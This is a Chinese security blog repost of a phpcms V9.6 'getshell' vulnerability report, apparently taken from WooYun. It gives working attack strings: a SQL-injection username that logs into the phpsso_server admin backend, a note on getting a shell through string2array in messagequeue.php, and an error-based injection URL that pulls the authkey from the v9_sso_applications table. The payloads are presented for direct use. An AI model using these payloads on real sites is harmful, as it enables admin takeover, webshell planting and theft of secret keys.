phpcmsV9.6 getshell

没穿底裤 2020年1月1日05:41:38评论593 views字数 760阅读2分32秒阅读模式
摘要

这个漏洞来自乌云,经过本地环境测试后,发现漏洞确实存在。
详细说明:
PHP双字节编码,这个本不应该出现的问题,或许因为过去太久远快被遗忘了,phpcms从20140929的v9.5.9版本起,增加了mysqli的支持,因为编写疏忽,导致该问题又重现江湖。漏洞本身无需细说。phpcms默认使用mysqli数据库,显示mysql语句错误(debug为true,呵呵完全可以爆错注入),而且安装过程不能修改。
漏洞影响:利用20140929的v9.5.9以后版本新建站点,以前版本升级的不受影响,故自评Rank为15

这个漏洞来自乌云,经过本地环境测试后,发现漏洞确实存在。
phpcmsV9.6 getshell

详细说明:
PHP双字节编码,这个本不应该出现的问题,或许因为过去太久远快被遗忘了,phpcms从20140929的v9.5.9版本起,增加了mysqli的支持,因为编写疏忽,导致该问题又重现江湖。漏洞本身无需细说。phpcms默认使用mysqli数据库,显示mysql语句错误(debug为true,呵呵完全可以爆错注入),而且安装过程不能修改。
漏洞影响:利用20140929的v9.5.9以后版本新建站点,以前版本升级的不受影响,故自评Rank为15

漏洞危害:利用漏洞直接登陆phpsso_server后台获取shell、注入等。

1、登陆登陆phpsso_server后台

code 区域
用户名:誠’ union select 1,0x706870636D73,0x3831346539303966363566316439313263646237636333393833623934333239,4,1,6,7 — k

密码:1

phpcmsV9.6 getshell

2、利用phpsso_server/phpcms/modules/admin/messagequeue.php页面的string2array函数获取shell。测试代码另存为html文件,登陆phpsso_server后,提交即可。测试时,请修改form的action属性。

3、注入。访问链接:**.**.**.**/phpcmsv9/index.php?m=pay&c=respond&a=respond_get&code=kkk%89′ and extractvalue(1, concat(0x7e, (select substr(authkey,1,30) FROM v9_sso_applications where appid=1),0x7e))–%20m
phpcmsV9.6 getshell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日05:41:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   phpcmsV9.6 getshellhttp://cn-sec.com/archives/76720.html

发表评论

匿名网友 填写信息